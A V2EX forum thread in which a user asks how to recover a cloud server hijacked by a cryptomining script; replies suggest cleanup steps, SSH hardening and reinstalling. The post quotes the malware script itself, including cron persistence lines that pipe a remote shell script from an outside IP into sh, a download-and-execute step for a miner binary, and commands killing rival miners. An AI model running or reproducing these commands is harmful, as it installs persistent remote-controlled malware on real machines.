服务器异常,被挂脚本.请问后续如何尽量保持正常使用?

2018-07-31 16:29:28 +08:00
 IntFloat

今天接到阿里短信提醒服务器有异常,登陆发现 cup 占用 100%。于是查看看 crontab 发现有个异常定时任务下载执行某段 sh。地址如下: http://149.56.106.215:8000/i.sh ,目前已经修改账户密码,删除定时任务,kill 异常程序,看进程展示正常了。请问接下来可以做什么操作尽量保证服务器正常运行。

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
5809 次点击
所在节点    Linux
16 条回复
whatever93
2018-07-31 17:03:56 +08:00
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi

从这段下手
/tmp/ddgs.3013 这个文件应该是主要的耗 cpu 文件
所以先删除他的文件 /tmp/ddgs.3013
rm -f /tmp/ddgs.3013
然后创建一个
touch /tmp/ddgs.3013
赋予不允许删除、添加、修改的权限
chattr +i /tmp/ddgs.3013
dorothyREN
2018-07-31 17:05:17 +08:00
清理完以后重装系统。
whatever93
2018-07-31 17:14:23 +08:00
然后 systemctl stop crond 先停止计划任务
清除脚本写的定时任务
查看~/.ssh/authorized_keys 里有没有异常的 key 清除掉
改密码 加防暴力破解 我自己用 fail2ban
metrxqin
2018-07-31 17:20:18 +08:00
调查下脚本怎么注入的。
jimmyczm
2018-07-31 17:22:09 +08:00
修改 ssh 的默认端口
defunct9
2018-07-31 17:22:32 +08:00
开 ssh,让我上去看看
IntFloat
2018-07-31 17:40:56 +08:00
@whatever93 感谢细致的回复,已经按您的方法清理了。希望不会有残留了
@dorothyREN 有些环境配置太繁琐了
@metrxqin 可能是账号密码泄露 - -
@jimmyczm 嗯嗯 新建主机时候已经改了 再改一次
@defunct9 毕竟是公司的测试服务器
hfenger
2018-07-31 17:53:08 +08:00
这狗逼的下载服务器炸了吧?我开了一万个线程都没速度啊
dorothyREN
2018-07-31 18:03:20 +08:00
@IntFloat 不是繁琐的问题,是谁也不知道服务器上究竟被做了什么手脚,脚本只是你能看到的。所以被入侵以后一般都是查找到原因以后重装系统并修复漏洞
xiri
2018-07-31 18:28:54 +08:00
@defunct9 #6 😂大哥你又来了
ywgx
2018-07-31 18:53:44 +08:00
目测你是 jenkins 机器?
scukmh
2018-07-31 19:05:01 +08:00
清理完直接重装,没个靠谱运维这是最快的办法。
cpdyj
2018-07-31 19:16:04 +08:00
建议你检查下其他所有可能下钩子的地方,bash,内核,模块,启动脚本,hash 一下 bin 里的东西和其他服务器对比下。。

其实建议还是重装系统,最暴力的方法
leakless
2018-08-01 00:49:31 +08:00
被人拿来挖矿了好吧。。。
上面这分析一堆就没有想到这是挖矿的吗。。。
p.s. 想啥呢啊 找人看看是不是你们的系统有洞被人日了 然后服务器赶紧重装。。。
johnnie502
2018-08-01 08:48:10 +08:00
不重装是等着过年呢
lieh222
2018-08-01 09:10:33 +08:00
格式化,重装,把业务用 docker 部署,数据不值钱的话随便攻击

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/475697

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX